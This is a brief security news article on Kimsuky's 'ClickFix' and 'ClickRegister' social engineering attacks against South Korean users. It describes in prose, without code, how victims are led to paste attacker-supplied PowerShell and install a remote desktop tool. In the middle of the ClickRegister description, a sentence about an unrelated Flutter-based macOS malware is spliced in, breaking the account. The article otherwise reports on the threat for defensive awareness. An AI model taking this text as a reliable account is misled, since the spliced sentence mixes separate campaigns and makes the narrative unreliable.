A sophisticated North Korean hacking group known as Kimsuky (also called Emerald Sleet) has been observed deploying a deceptive social engineering technique called "ClickFix" to target South Korean users.
The ClickFix tactic tricks users by displaying fake browser notifications claiming that a webpage, document, or video call feature needs fixing. Users are prompted to click a "Fix It" button and follow steps that involve copying and running malicious PowerShell scripts, which then download and execute malware without browser involvement.
Microsoft's threat analysts recently uncovered a variant of this attack, dubbed "ClickRegister." The hackers first establish communication with targets and build rapport before sending spear-phishing emails containing PDF attachments. When recipients try to view these documents, they are directed to a URL with device registration instructions.
North Korean state-sponsored hackers have developed a new malware targeting macOS systems by exploiting Flutter, a popular framework for building cross-platform applications. The registration process requires users to run PowerShell with administrator privileges and paste code provided by the attackers. This code installs a browser-based remote desktop tool and downloads a certificate file with a preset PIN from a remote server. The compromised system then registers itself using these credentials, allowing hackers to access the device and steal data.
While this tactic has been observed in limited attacks since January 2025, it represents a notable shift in Kimsuky's strategy. The group traditionally targeted individuals involved in international affairs, particularly those focused on Northeast Asia, along with NGOs, government agencies, and media organizations across multiple continents.
Security experts recommend organizations implement strict system controls and attack surface reduction rules to protect against these threats, as traditional security awareness training may not be sufficient to counter such sophisticated social engineering tactics.